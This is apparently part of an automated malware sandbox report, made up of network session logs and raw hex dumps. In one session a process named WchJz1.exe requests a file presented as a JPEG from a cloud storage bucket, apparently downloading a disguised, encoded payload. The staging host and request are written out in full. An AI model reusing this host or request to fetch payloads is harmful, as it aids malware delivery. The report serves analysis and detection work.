2024-12-24 14:13:28 UTC	4096	IN	Data Raw: 76 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4 Data Ascii: v;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>\|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V\|
2024-12-24 14:13:28 UTC	4096	IN	Data Raw: 77 a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f Data Ascii: wV(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi\|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
2024-12-24 14:13:28 UTC	4096	IN	Data Raw: f5 f5 f3 fb ff fd f3 f5 f7 f5 f3 eb ef ed d3 d5 d7 d5 d3 dd bf a7 d3 d5 d3 d5 d3 2d 2f 2d 33 37 37 75 32 3d 3f 2d 33 35 27 35 33 2d 2f 3d 53 55 47 55 53 5d 5f 5d 53 45 57 55 53 11 b2 50 73 3f 77 75 73 f1 8d 4d 73 a9 77 75 73 6d 3f 17 53 b5 56 55 53 5d 5f 5d 53 55 57 55 53 2d 2f 2d 33 35 37 35 33 3d 0f 47 33 15 2c 35 33 2d 2f 2d d3 d5 d7 d5 d3 dd df dd d3 d5 d7 d5 d3 ed ef ed f3 f5 f7 f5 f3 fd ff fd f3 f5 f7 f5 f3 4d c9 97 d3 95 d7 d5 d3 dd df dd d3 d5 d7 d5 d3 2d 1f 00 33 51 37 35 33 3d 3f 3d 33 35 37 35 33 2d 2f 2d 53 55 57 55 53 5d 5f 5d 53 55 57 55 53 43 1b 08 0b 01 77 75 73 1e cd 7c 73 75 67 75 73 6d 6f 6d 53 55 57 55 53 5d 5f 5d 53 55 57 55 53 2d 2f 2d 33 15 37 35 53 13 4d 59 52 41 56 35 33 e5 a6 2d d3 d5 07 d4 d3 dd df dd d3 d5 d7 d5 d3 ed ef ed f3 Data Ascii: -/-377u2=?-35'53-/=SUGUS]_]SEWUSPs?wusMswusm?SVUS]_]SUWUS-/-35753=G3,53-/-M-3Q753=?=35753-/-SUWUS]_]SUWUSCwus\|sugusmomSUWUS]_]SUWUS-/-375SMYRAV53-
2024-12-24 14:13:28 UTC	4096	IN	Data Raw: d1 7d e2 3a fb d9 7f 2d 5c 08 7e 89 cb e9 3a 78 19 d3 d3 54 a8 dd 3b c0 68 9c d3 da f6 a0 3f b8 09 85 13 9c b2 89 02 f5 bb 84 84 22 99 a1 5c eb db e4 e4 52 d7 a8 84 57 57 3d d3 53 dd 2c 15 fe 48 f8 17 59 7b 94 02 a5 74 75 f2 ab 6b 6d 53 55 5c 97 a4 8d b7 85 fd 1e 57 33 82 c4 fc f5 5b b3 98 02 7d b4 7b 18 33 b8 53 11 3f c4 e7 e4 99 d5 df 7a 12 6b f1 4b ab 5b 8f 5c 2e 0b c5 75 fb 0d d3 04 7a 6d a5 1d 7f b1 af 41 46 fd 97 72 44 70 9c 6c f0 98 c6 38 c7 3a 4f 9d 67 53 5d 8b 18 45 fa 27 78 f9 2c e7 bf e3 1a 15 03 e6 d9 54 24 d6 03 bf c8 c3 24 e4 ff 0d e1 62 93 bb 32 d3 1d e0 a9 69 56 22 dc 79 04 9f f6 79 91 f4 ce a4 27 3e 2c 7c 5a 6b f3 21 34 52 4f 12 6e 97 99 0b 32 20 48 ad 50 69 a7 06 6a 8b 46 53 7e 44 e7 8d 63 9d 43 d3 36 f2 39 ef 4b 76 db 20 c3 a9 cd f4 6d Data Ascii: }:-\~:xT;h?"\RWW=S,HY{tukmSU\W3[}{3S?zkK[\.uzmAFrDpl8:OgS]E'x,T$$b2iV"yy'>,\|Zk!4ROn2 HPijFS~DcC69Kv m
2024-12-24 14:13:28 UTC	4096	IN	Data Raw: 5c f2 f3 f2 cb a8 4e 59 1d d2 ce 66 43 81 7b ff 67 50 14 99 fb dd 4e 2d 27 1b 3b 32 e1 3d 33 3a 03 dd 71 52 2f 3d b3 f7 09 f2 37 09 35 05 d2 00 d7 a7 6e a2 5b 79 ad 9f 96 b5 c6 ed 9d 66 b3 39 53 74 34 ad bd bc 93 b3 fe 71 77 93 a5 84 18 86 55 55 ba d3 80 5c 53 d8 33 71 4b ee a2 49 17 31 de 70 f5 2e 3f d4 1a 6a 27 35 da f8 c9 29 d3 3d 14 a5 d5 dd 18 d9 f7 74 d2 59 bd 8b 6e 18 e6 02 30 b1 d7 f9 6b fa e2 61 91 0a 36 8b dc 30 3b 0f bb de d3 87 8c 44 53 a3 22 0d aa a3 e3 13 d4 68 4b 97 1e 19 a2 5f ef 4f 5c 9c 5f 83 e2 ed 0e 6b 27 d3 18 e0 1f 57 f6 99 4e 8f 66 e4 e9 d6 c4 39 a5 10 98 95 71 d9 7b bc 71 9c 9c 89 c1 9c 58 3a b4 2b 66 f8 3c 84 df 79 ba 43 96 ad af 4f c6 9e 70 72 72 50 0a 98 50 ac 17 9d c0 f8 94 89 96 25 87 df 01 09 25 05 6d 3f 30 e0 76 8e 06 07 6c Data Ascii: \NYfC{gPN-';2=3:qR/=75n[yf9St4qwUU\S3qKI1p.?j'5)=tYn0ka60;DS"hK_O\_k'WNf9q{qX:+f<yCOprrPP%%m?0vl
2024-12-24 14:13:28 UTC	4096	IN	Data Raw: 20 fb 64 56 1a 91 6e df 20 2c 89 77 e2 e2 05 39 f2 8e f5 00 2d 52 de 02 01 04 ca 1a ce 6a d2 47 a1 f6 d0 fe 59 5f 7b be ab de 7e b5 7b 3a bc 5c 60 b4 14 c4 40 8e 4f 1b d3 50 30 ca 88 05 19 87 a6 6c 44 9c 38 ec 39 0e 59 7b 02 e0 f1 72 5e f5 ad 67 1a cd 99 59 ab ba 5e 62 b2 6a a6 96 6c 3f b0 7f 47 31 af f9 8d b1 e6 2c 04 cc 68 ac 20 ea 27 da fc 3a c9 29 c2 2d 03 bc 6d b2 50 da 12 b2 4e b6 81 da 21 4d f8 86 bb 30 9c c3 3a 42 00 c7 75 98 22 d5 e2 ed f7 ca c4 d5 09 a4 4e 82 04 d4 70 9c 5e b4 e3 6c a8 46 17 b5 25 7a 7b b5 5c 61 52 62 b2 1a fe 80 42 8b a0 8b af 69 84 9a 79 9f 8b 45 e0 9d 05 e1 0c 2d e5 1f 50 b8 e2 04 38 e7 df 32 37 b0 48 b1 af 82 c3 27 a8 d2 aa e1 62 df e9 b2 a2 12 f5 be 96 d6 5d 5d 4d 27 3a 1a 32 92 06 ad 9a 5b a6 db 14 ee 80 13 e1 a7 67 c5 71 Data Ascii: dVn ,w9-RjGY_{~{:\`@OP0lD89Y{r^gY^bjl?G1,h ':)-mPN!M0:Bu"Np^lF%z{\aRbBiyE-P827H'b]]M':2[gq
2024-12-24 14:13:28 UTC	4096	IN	Data Raw: 11 ac 16 c6 07 c4 9d 58 cd bb f4 f0 2b 3a 16 5a da 8a 33 81 27 42 b4 e4 1c b3 44 f3 eb 30 85 ed 13 a0 b4 46 35 68 06 83 59 2b bf 9b 83 03 97 31 12 15 bc 78 b1 76 b9 71 21 32 04 6b 81 a4 83 32 6f d6 69 98 27 df ea f9 0c 4f 4b 67 2f 4b 06 67 44 04 ef 78 60 0a 1a 43 f5 40 32 c2 0d 65 17 e5 08 cc a8 23 c1 d9 dd 70 6e 88 fc 7f 8d 81 6d 3c 8a c0 7c 8f 3d 55 13 79 ca fa 4f 7d 9f 59 1f ab 7a 58 3c b6 7e 0a 9f 2b 23 7e 6a 96 9f 38 e0 63 e5 5a 1a 32 5b b4 2a 2e c8 4b fc 30 60 d4 a2 2b 2b bb 40 ab 29 c3 47 5a c5 72 2a 67 22 60 fd 3a 2c 8c 49 94 ad 10 8c f4 1c aa 13 b2 44 63 6e 0d 2e 1c 0e 75 75 75 69 83 57 e4 6c 56 e5 7f 18 20 b8 d1 37 88 2a 1b 65 fe 57 b8 31 b5 b2 3c d8 01 d7 18 1c 20 44 7d d7 1c 11 ca 50 b1 34 77 e7 17 39 01 6f c0 e8 d3 94 88 53 e8 54 bc 80 c3 59 Data Ascii: X+:Z3'BD0F5hY+1xvq!2k2oi'OKg/KgDx`C@2e#pnm<\|=UyO}YzX<~+#~j8cZ2[.K0`++@)GZrg"`:,IDcn.uuuiWlV 7*eW1< D}P4w9oSTY
2024-12-24 14:13:28 UTC	4096	IN	Data Raw: ef cc 4c d0 d3 09 06 21 8c 0a e4 fd 58 ee 29 db 81 82 6d c1 a4 30 bc c1 88 36 cd ab 62 b5 32 ab fb fb ec 20 e3 1f be d1 52 c7 7b bf 58 54 f3 43 f2 8d 0e 8b f7 13 10 a0 bb 4f ee a1 7a 27 8f 37 90 b6 93 e7 12 94 df b3 75 98 ed 5e 3f 26 b3 6b dc e4 4b ac 06 65 59 29 76 21 46 e6 59 50 ec 8d 23 41 76 61 bd b4 2a c0 a1 d0 00 7d 85 b9 46 a9 73 14 b0 38 5b 50 8e c5 4d 41 4e b1 33 ec 52 c8 9b 60 d6 75 f5 94 ee 23 f4 6f f6 e6 d2 e9 4d 56 be d7 e4 8f 26 6e aa 79 e5 e6 5e 13 6c 17 b6 e2 e2 11 f5 fe 7e 0b 44 9b c6 aa 3a f9 70 8c 7b bc 07 41 a6 db 37 9c 40 ed 30 d4 63 08 f2 34 c3 bc 19 00 1b 0e a0 05 0a d9 18 ea e0 fd 6c 8a 5d c5 2d 44 59 87 c8 6a f8 9f 94 42 5d b7 0d 78 f1 3b 58 f0 58 03 2c 94 05 87 6d 14 59 c3 c8 52 68 6d 20 54 3c df df dd d3 b3 5e da 3a d6 ef ef f3 Data Ascii: L!X)m06b2 R{XTCOz'7u^?&kKeY)v!FYP#Ava*}Fs8[PMAN3R`u#oMV&ny^l~D:p{A7@0c4l]-DYjB]x;XX,mYRhm T<^:
2024-12-24 14:13:28 UTC	4096	IN	Data Raw: 15 03 58 89 56 b4 b6 a2 ad 03 9c f1 67 d1 75 f3 e8 19 38 39 86 89 50 71 f6 9c 55 6e f0 3c 79 b6 4b a6 36 b9 b4 a2 ab 24 ae 39 77 96 dd 86 d0 fd 7d 97 cb 0d f0 c5 e3 02 f9 c1 52 24 d9 92 d5 0f ce ba 02 8d 60 9d a4 7e 46 0c f6 07 7e 6e 99 9f b7 49 61 ff 7c c2 1d c4 45 e2 10 ab 9d 5d f3 48 c7 32 f2 49 bd 7e 2c f3 14 b8 55 84 3b b6 cd f2 2c a2 4e c8 2f 6a 5f 90 af 64 33 93 34 22 de 67 0c 00 0a 07 58 6d 1d 91 a5 e8 77 57 3e 92 ad 64 db 25 db 5a a7 9e fb ee 37 1e bf 9f 1c 20 8f 58 83 8e 9c 9d 1a 84 f4 2f e8 b6 e9 fc 5c 14 cf 3d a8 20 c1 36 73 8b 6d ad fa 19 32 a5 19 e7 34 c8 51 2a b2 c7 6f 71 16 6b 1a c9 12 87 4a 5b 13 27 7e 0c 5d 42 3e 1f df 6d a6 94 82 5a 53 5e fd 07 49 a4 e3 fa f2 49 de ae 8b 50 62 d9 cf c2 ba 82 06 00 8f 34 6e 19 e8 d9 e4 90 5c e0 85 6f a3 Data Ascii: XVgu89PqUn<yK6$9w}R$`~F~nIa\|E]H2I~,U;,N/j_d34"gXmwW>d%Z7 X/\= 6sm24Q*oqkJ['~]B>mZS^IIPb4n\o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49839	118.178.60.9	443	6808	C:\Users\user\Documents\WchJz1.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 14:13:42 UTC	115	OUT	GET /FOM-53.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2024-12-24 14:13:42 UTC	546	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Tue, 24 Dec 2024 14:13:42 GMT Content-Type: image/jpeg Content-Length: 366410 Connection: close x-oss-request-id: 676AC19666708538311B02C3 Accept-Ranges: bytes ETag: "DA1D5EB665D3AAD523BE59415E6449ED" Last-Modified: Tue, 22 Oct 2024 14:47:51 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 5641369857548672686 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 2h1etmXTqtUjvllBXmRJ7Q== x-oss-server-time: 9
2024-12-24 14:13:42 UTC	3550	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2024-12-24 14:13:42 UTC	4096	IN	Data Raw: 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 e0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 a0 60 60 Data Ascii: ```````````````````````````````````````````````````````````````
2024-12-24 14:13:42 UTC	4096	IN	Data Raw: 60 60 eb 25 68 30 9f 75 d0 14 62 70 e9 25 84 e3 1d 84 60 15 67 52 a0 89 a9 60 60 60 06 67 e5 4c a2 a0 c6 2b ed ac f1 5f b5 0c d4 a2 b0 c6 29 e5 4e 2b f5 44 2b e2 ac 2b a8 2b b1 29 f5 10 8a f0 6d a5 0c b0 6b ad 34 6b b1 a8 b2 1f f5 2c 94 e2 f0 63 18 1f 95 e7 d2 20 09 68 e0 e0 e0 67 e5 5c a1 a0 a0 a0 ca a4 2d e5 5c f0 ca a8 c8 5f 5f a0 a0 2b ed 74 2b f1 e8 f2 5f b5 08 d4 a2 70 e5 a0 15 59 a7 25 b8 61 60 60 60 a7 25 bc 40 df 62 60 a7 25 80 e8 73 60 60 0a 60 0a 60 ed 25 48 f0 ca a0 ca a0 ca ac 2d ed 78 f1 c8 a4 a0 a0 38 2b f5 74 2b e2 e8 f0 5f b5 00 d4 a2 b0 2b ed 34 26 a1 b3 e1 8a e0 8a e0 8a e0 6b b5 34 b2 88 69 f7 e0 f0 8a e0 8a e0 08 da 10 e0 e0 63 24 fc 2b ed 74 29 e1 e4 10 a1 2b 45 fd 62 a8 a0 f5 2b 4c 18 b8 6a a0 a0 48 9a a7 a1 a0 f6 f7 2b e5 a8 e9 e5 Data Ascii: ``%h0ubp%`gR```gL+_)N+D+++)mk4k,c hg\-\__+t+_pY%a```%@b`%s````%H-x8+t+_+4&k4ic$+t)+Eb+LjH+
2024-12-24 14:13:42 UTC	4096	IN	Data Raw: 9d 9f 9f 31 ed f5 f4 9e 9f 9f 32 88 1d 9d 60 60 e3 a4 70 ed e5 f4 9e 9f 9f 30 ed ed 10 5d 5f 5f f1 5f b5 30 d2 a2 b0 ca a0 c8 20 a0 a0 a0 ca a2 ca a0 ca a2 c8 a0 a0 a0 e0 c8 a0 4c a2 f0 1f f5 74 92 e2 f0 69 65 84 1d 1f 1f 63 5d 84 1d 1f 1f 1f 95 e7 d3 20 09 0a e0 e0 e0 8a e0 6d 35 cc 5d 5f 5f f2 2b e5 a8 f0 48 06 5c a0 a0 23 64 a4 2b ed ac 8b 68 23 49 a1 f1 2b f5 a8 f2 48 f1 9c 60 60 e3 a4 64 eb 2d 68 ed 34 61 61 32 eb e5 04 9d 9f 9f 30 9f 75 f8 12 62 70 eb ed 04 9d 5f 5f f1 5f b5 44 d2 a2 b0 c8 54 a1 a0 a0 5f b5 6c d2 a2 b0 ca a1 c8 8c 4c a2 b0 48 61 5c 5f 5f 63 24 e8 8a e0 88 b8 0c e2 f0 08 dd 1b e0 e0 63 24 e8 63 18 1f 94 d0 8a e0 8a e0 8a e0 6d 75 18 5e 5f 5f f2 c8 24 4c a2 b0 ca a0 5f b5 a0 d3 a2 b0 ca a0 01 68 ec a5 b0 f0 5f b5 3c d2 a2 b0 ca 60 9f Data Ascii: 12``p0]___0 Ltiec] m5]__+H\#d+h#I+H``d-h4aa20ubp___DT_lLHa\__c$c$cmu^__$L_h_<`
2024-12-24 14:13:42 UTC	4096	IN	Data Raw: 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 44 45 46 47 48 49 4e 4e 4e 4a 4b 4e 8e 8e 8c 8d f5 2b 4c 21 4c 18 a2 a0 a0 29 2d e8 5d 5f 5f c8 ac 4e a2 b0 48 3e a3 a0 a0 23 64 a4 8a e0 88 f4 0e e2 f0 08 d5 0d 1f 1f 63 24 e8 8a e0 88 d0 0e e2 f0 08 c6 0d 1f 1f 63 24 e8 88 08 a3 a0 a0 5f b5 6c d2 a2 b0 c8 e8 4e a2 b0 5f b5 20 d2 a2 b0 c8 c0 4e a2 b0 5f b5 20 d2 a2 b0 c8 88 63 60 60 9f 75 ac 12 62 70 08 64 61 60 60 ed e5 98 9e 9f 9f 30 0a 60 9f 75 e4 12 62 70 a6 e5 24 5e 5f 5f eb 66 25 25 5e 5f 5f e5 66 25 26 5e 5f 5f f2 66 25 27 5e 5f 5f ee 66 25 28 5e 5f 5f a5 26 65 69 1e 1f 1f ac 26 65 6a 1e 1f 1f d3 26 65 6b 1e 1f 1f d2 26 65 6c 1e 1f 1f ce 26 65 6d 5e 5f 5f c4 66 25 2e 5e 5f 5f cc 66 25 2f 5e 5f 5f cc 66 25 30 5e 5f 5f a0 66 25 d4 5e 5f 5f e7 a6 e5 Data Ascii: NNNNNNNNNNNNNNNNNDEFGHINNNJKN+L!L)-]__NH>#dc$c$_lN_ N_ c``ubpda``0`ubp$^__f%%^__f%&^__f%'^__f%(^__&ei&ej&ek&el&em^__f%.^__f%/^__f%0^__f%^__
2024-12-24 14:13:42 UTC	4096	IN	Data Raw: 90 12 62 70 d8 61 60 60 60 8b 62 8b 80 eb 85 3d a3 35 eb 8c e3 8c 08 37 eb 25 68 e9 25 38 66 e5 3c a0 19 b8 a0 a0 a0 93 60 2d dd 3d 53 0b c6 0b 0a ca c4 2b ed 38 f1 2d f5 3c f2 48 92 2f e0 e0 63 24 ec 6d a5 7c b0 6b ed 28 09 e2 f0 b1 88 78 a5 e5 f0 6b b5 78 63 22 84 b2 08 df 1f 5f 5f 23 64 b0 93 60 ff 2b 45 fd 62 a4 a0 f5 2b 4c ca a0 01 68 49 a2 b0 f0 c8 38 e5 a5 b0 2b ed 68 31 88 7a 9f 9f 9f e3 a4 70 53 a0 3d a2 64 60 35 eb 8c 0a 60 c1 60 60 60 70 30 08 60 60 60 70 2b ed a8 f1 48 58 5e 5f 5f 23 64 b0 93 60 fd 62 a4 a0 f5 2b 4c 21 4c 80 a4 a0 a0 f7 c8 cc 4f a2 f0 1f f5 68 92 e2 f0 69 a5 18 d3 20 86 41 6a dd e5 f0 65 20 95 e5 09 a7 e1 e0 e0 d3 29 86 6b ed 2a 9d a5 b0 29 ed 5c 2b f5 5c 61 42 aa 29 f5 50 ca a0 c8 20 a0 a0 a0 ca a4 ca a0 ca a2 c8 a0 a0 60 20 Data Ascii: bpa```b=57%h%8f<`-=S+8-<H/c$m\|k(xkxc"__#d`+Eb+LhI8+h1zpS=d`5````p0```p+HX^__#d`b+L!LOhi Aje )k*)\+\aB)P `
2024-12-24 14:13:42 UTC	4096	IN	Data Raw: 60 60 eb 25 68 30 ed ed 40 9d 9f 9f 31 88 00 df 60 60 e3 a4 6c a6 e5 f8 9e 9f 9f 60 d9 f9 a0 a0 a0 93 60 2d 1d 39 5e 5f 5f 53 0b c6 0b 0a ca a0 ca a0 ca a2 ca a0 ca a1 c8 a0 a0 a0 e0 6d 75 cc 1e 1f 1f b2 1f f5 74 92 e2 f0 69 65 70 1e 1f 1f 63 5d 70 1e 1f 1f 1f 95 e7 d3 20 09 11 a0 a0 a0 ca a0 2d 25 34 5e 5f 5f f0 2b ed ac 21 49 d0 a1 a0 a0 f1 2b f5 a8 21 62 d0 a1 a0 a0 f2 eb e5 f0 9e 9f 9f 30 9f 75 f8 12 62 70 e5 a0 15 67 53 a0 89 dc 60 60 60 eb ed f0 9e 9f 9f 31 9f b5 a4 ed a5 b0 2d 35 88 5d 5f 5f f2 48 c4 6c a0 a0 23 64 a4 25 60 d4 85 2d 25 88 5d 5f 5f f0 2d 6d cc 1e 1f 1f b1 88 6c 11 e2 f0 6d 75 78 1e 1f 1f b2 1f f5 b4 ad e5 f0 63 24 f0 0b f4 6d 65 cc 5e 5f 5f f0 2d 2d 38 5e 5f 5f f1 5f b5 68 d2 a2 b0 2b 35 84 5d 5f 5f 29 35 bc 5d 5f 5f 23 1d bc 9d 9f Data Ascii: ``%h0@1``l``-9^__Smutiepc]p -%4^__+!I+!b0ubpgS```1-5]__Hl#d%`-%]__-mlmuxc$me^__--8^___h+5]__)5]__#
2024-12-24 14:13:42 UTC	4096	IN	Data Raw: ac ac 35 eb 8c 53 a0 c0 4c c6 65 70 e3 80 61 e5 a0 15 6f ea 6d 4c c6 65 70 e0 a9 61 e8 ad 8c 06 a5 b0 fd 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c f5 2b 4c f1 29 ed 5c 2b e5 ac 2a e8 6b b5 1c 68 ea 8a e0 6b ad 1c 08 f5 e2 e0 e0 6b a5 e8 b0 6b ad 1c 08 a9 e1 e0 e0 6b a5 1c 6b 45 fd 62 a8 a0 f5 2b 4c f1 29 ed 5c ca a1 2b ed 5c 48 4f a1 a0 a0 2b 45 fd 63 6c 6c 6c 6c 6c 6c ac ac ac ac ac 35 eb 8c 31 e9 2d 9c ea 25 68 30 0a 61 eb 2d 9c 88 eb 60 60 60 eb 85 3d a2 64 60 6c 6c 6c 6c 6c f5 2b 4c f1 29 ed 5c 2b e5 5c 2b e8 a8 9b ed a8 d7 a5 48 c2 c9 a1 a0 2b ed 5c 48 f1 e1 e0 e0 6b b5 1c 6b a2 e4 e3 a5 e8 6b 05 bd 22 e4 e0 2c 2c b5 6b 0c 63 0c e8 69 ad 1c 6b a5 5c 23 d8 a4 a0 d5 aa 48 c9 a1 a0 a0 29 e5 58 4b a9 2b ed 5c 2b f1 a4 29 f5 58 2b e5 58 2b 45 fd a3 ac Data Ascii: 5SLepaomLepacllllllllllllll+L)\+*khkkkkkEb+L)\+\HO+Ecllllll51-%h0a-```=d`lllll+L)\+\+H+\Hkkk",,kcik\#H)XK+\+)X+X+E
2024-12-24 14:13:42 UTC	4096	IN	Data Raw: e3 98 1d 15 6a a7 65 0c 94 62 70 60 60 60 60 e3 5d 0c 94 62 70 60 14 41 08 12 74 60 60 5f b5 6c d2 a2 b0 2b 2d 44 5e 5f 5f 48 7c 5c 5f 5f 2b 2d 44 5e 5f 5f 48 ff 5d 5f 5f 2b ed 54 c4 69 ed e0 e0 e0 e0 bf be bb 6b 05 bd 22 e8 e0 2c 2c 2c 2c 2c 2c b5 6b 0c b1 69 ad 1c 6b ad 1c 08 23 5c 5f 5f 2b e5 a8 23 40 a1 25 60 d4 ac 2b ed 5c f1 48 53 3e a0 a0 23 64 a4 2b e5 5c 2b 45 fd a2 64 60 ac ac 35 eb 8c 88 67 60 60 60 88 71 60 60 60 3d a3 35 eb 8c d9 ad 2c 65 70 88 75 3c 61 a0 fd 63 f5 2b 4c c8 f0 d7 a0 b0 48 10 0d a0 a0 23 64 a4 fd 63 f5 2b 4c 19 6d ec a5 b0 48 d3 fd e1 e0 bd 23 b5 6b 0c 08 e7 e0 e0 e0 08 f1 e0 e0 e0 bd 23 b5 6b 0c 59 2c ac e5 f0 08 30 89 e1 e0 fd 63 f5 2b 4c c8 2f d7 a0 b0 48 d1 0d a0 a0 23 64 a4 fd 63 f5 2b 4c 19 6c ec a5 b0 48 90 cb a1 60 3d Data Ascii: jebp````]bp`At``_l+-D^__H\|\__+-D^__H]__+Tik",,,,,,kik#\__+#@%`+\HS>#d+\+Ed`5g```q```=5,epu<ac+LH#dc+LmH#k#kY,0c+L/H#dc+LlH`=
2024-12-24 14:13:42 UTC	4096	IN	Data Raw: 25 d0 30 9f 75 4c 10 62 70 eb 2d f8 e9 2d e4 eb 35 d0 32 9f 75 84 12 62 70 eb 25 cc 30 5f b5 44 d2 a2 b0 2b ed 24 29 ed 18 4b a7 67 e5 18 a0 a0 a0 a0 23 dd 14 a0 d4 aa 2b f5 14 f2 5f f5 ec 92 e2 f0 6b a5 58 6b 05 bd 23 b5 6b 0c 61 0c 7c e5 e0 e0 88 df 68 e0 f0 88 50 3d e4 f0 1f b5 80 d0 a2 b0 03 54 ed a5 b0 67 a5 58 ed a5 b0 80 a0 a0 a0 67 a5 a0 ee a5 b0 a7 a0 a0 a0 67 a5 64 2e 65 70 60 60 60 60 a7 65 70 2e 65 70 b0 67 60 60 a7 65 6c 2e 65 70 61 60 60 60 a7 65 9c 2d a5 b0 a2 a0 a0 a0 c8 58 ed a5 b0 01 54 ed a5 b0 f0 5f b5 c4 d0 a2 b0 67 a5 ac ee a5 b0 a0 a0 a0 e0 88 14 e1 e0 e0 1f f5 2c 92 e2 f0 27 65 8c 1f 1f 1f 74 e0 e0 e0 6d 6d 8c 1f 1f 1f b1 1f f5 f8 d2 a2 b0 23 1d d0 5f 5f 5f a6 d3 96 67 a5 5c ed a5 b0 a4 a0 a0 a0 c8 58 ed a5 b0 2b b5 54 ed a5 70 32 Data Ascii: 